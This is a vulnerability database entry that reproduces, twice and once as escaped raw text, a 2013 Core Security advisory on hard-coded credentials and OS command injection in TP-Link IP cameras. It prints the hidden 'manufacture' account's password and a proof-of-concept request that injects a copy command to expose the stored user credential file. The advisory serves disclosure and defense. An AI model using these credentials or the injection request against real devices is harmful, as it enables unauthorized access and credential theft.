VAR-202001-0854
Vulnerability from variot - Updated: 2024-08-14 14:19A Security Bypass vulnerability exists in TP-LINK IP Cameras TL-SC 3130, TL-SC 3130G, 3171G, 4171G, and 3130 1.6.18P12 due to default hard-coded credentials for the administrative Web interface, which could let a malicious user obtain unauthorized access to CGI files. plural TP-Link IP Camera The product contains a vulnerability involving the use of hard-coded credentials.Information may be obtained. TP-Link IP Cameras is an IP camera device. Multiple TP-Link IP Cameras devices use the default account with a username of 'manufacture' and a password of 'erutcafunam', allowing remote attackers to use this account information to gain unauthorized access to the device. An attacker can leverage this issue to gain access to the vulnerable device.
Proof-of-concept code that exploits the vulnerability is publicly available.
Administrators are advised to implement an intrusion prevention system (IPS) or intrusion detection system (IDS) to help detect and prevent attacks that attempt to exploit this vulnerability.
TP-Link has released beta versions that fix this vulnerability. Administrators are advised to contact the vendor for future updates. Core Security - Corelabs Advisory http://corelabs.coresecurity.com
TP-Link IP Cameras Multiple Vulnerabilities
- Advisory Information
Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: TP-Link Release mode: Coordinated release
- Vulnerability Information
Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2572, CVE-2013-2573
- Vulnerability Description
Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker:
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[CVE-2013-2573] to execute arbitrary commands from the administration web interface. This flaw can also be used to obtain all credentials of registered users.
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Tests and PoC were run on:
. TL-SC 3130 [CVE-2013-2572] works with this device only . TL-SC 3130G . TL-SC 3171G . TL-SC 4171G
Other TP-Link cameras and firmware versions are probably affected too, but they were not checked.
- Vendor Information, Solutions and Workarounds
Vendor provides the links to patched firmware versions. This software is beta, TP-Link will release the final versions with release notes and some new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip
- Credits
These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
- Technical Description / Proof of Concept Code
7.1. 'boa.conf' is the Boa configuration file, and the following account can be found inside:
/-----
MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam -----/
This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/':
- 'manufacture.cgi'
- 'wireless_mft.cgi'
The last file contains the OS command injection showed in the following section.
7.2. OS Command Injection in wireless_mft.cgi
[CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section:
/----- username: manufacture password: erutcafunam -----/
The following proof of concept copies the file where the user credentials are stored in the web server root directory:
/----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/
Afterwards, the user credentials can be obtained by requesting:
/----- http://192.168.1.100/credenciales -----/
- Report Timeline
. 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30: TP-Link team asks for a report with technical information. 2013-05-02: Technical details sent to TP-Link. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th. 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed. 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will increase some new functions. 2013-05-28: Advisory CORE-2013-0318 published.
- References
[1] http://www.boa.org/.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
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Multiple TP-Link IP Cameras devices use the default account with a username of \u0027manufacture\u0027 and a password of \u0027erutcafunam\u0027, allowing remote attackers to use this account information to gain unauthorized access to the device. \nAn attacker can leverage this issue to gain access to the vulnerable device. \n\nProof-of-concept code that exploits the vulnerability is publicly available. \n\nAdministrators are advised to implement an intrusion prevention system\n(IPS) or intrusion detection system (IDS) to help detect and prevent\nattacks that attempt to exploit this vulnerability. \n\nTP-Link has released beta versions that fix this vulnerability. Administrators are advised to contact the vendor for future updates. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com\n\nTP-Link IP Cameras Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: TP-Link IP Cameras Multiple Vulnerabilities\nAdvisory ID: CORE-2013-0318\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities\nDate published: 2013-05-28\nDate of last update: 2013-05-28\nVendors contacted: TP-Link\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Use of hard-coded credentials [CWE-798], OS command injection\n[CWE-78]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-2572, CVE-2013-2573\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in TP-Link IP cameras based on\nfirmware v1.6.18P12 and below, that could allow an unauthenticated\nremote attacker:\n\n 1. \n 2. [CVE-2013-2573] to execute arbitrary commands from the\nadministration web interface. This flaw can also be used to obtain all\ncredentials of registered users. \n\n4. \nTests and PoC were run on:\n\n . TL-SC 3130 [CVE-2013-2572] works with this device only\n . TL-SC 3130G\n . TL-SC 3171G\n . TL-SC 4171G\n\nOther TP-Link cameras and firmware versions are probably affected too,\nbut they were not checked. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nVendor provides the links to patched firmware versions. This software is\n*beta*, TP-Link will release the final versions with release notes and\nsome new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip\n . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Nahuel Riva and\nFrancisco Falcon from Core Exploit Writers Team. The publication of this\nadvisory was coordinated by Fernando Miranda from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\n7.1. \u0027boa.conf\u0027 is the Boa\nconfiguration file, and the following account can be found inside:\n\n/-----\n# MFT: Specify manufacture commands user name and password\nMFT manufacture erutcafunam\n-----/\n\nThis account is not visible from the user web interface; users are not\naware of the existence and cannot eliminate it. Through this account it\nis possible to access two CGI files located in \u0027/cgi-bin/mft/\u0027:\n\n 1. \u0027manufacture.cgi\u0027\n 2. \u0027wireless_mft.cgi\u0027\n\nThe last file contains the OS command injection showed in the following\nsection. \n\n7.2. *OS Command Injection in wireless_mft.cgi*\n\n[CVE-2013-2573] The file \u0027/cgi-bin/mft/wireless_mft.cgi\u0027, has an OS\ncommand injection in the parameter \u0027ap\u0027 that can be exploited using the\nhard-coded credentials showed in the previous section:\n\n/-----\nusername: manufacture\npassword: erutcafunam\n-----/\n\nThe following proof of concept copies the file where the user\ncredentials are stored in the web server root directory:\n\n/-----\nhttp://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales\n-----/\n\nAfterwards, the user credentials can be obtained by requesting:\n\n/-----\nhttp://192.168.1.100/credenciales\n-----/\n\n8. *Report Timeline*\n\n. 2013-04-29:\nCore Security Technologies notifies the TP-Link Customer Support of the\nvulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30:\nTP-Link team asks for a report with technical information. 2013-05-02:\nTechnical details sent to TP-Link. 2013-05-12:\nVendor notifies that a new firmware will be released around May 20th. 2013-05-16:\nCore asks vendor if they are ready for coordinated public disclosure on\nMay 20th. 2013-05-17:\nVendor notifies that they have fixed the firmware but the testing\nprocess won\u0027t be ready before May 24th. 2013-05-20:\nCore notifies that the advisory publication was re-scheduled for Monday\n27th. 2013-05-23:\nVendor sends a copy of the beta firmware in order to confirm if issues\nwere fixed. 2013-05-27:\nVendor notifies that consumers are able to download the Beta firmware\nfrom TP-Link website. The final release will be made public in the\nfollowing days, and will increase some new functions. 2013-05-28:\nAdvisory CORE-2013-0318 published. \n\n9. *References*\n\n[1] http://www.boa.org/. \n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
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Sightings
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Nomenclature
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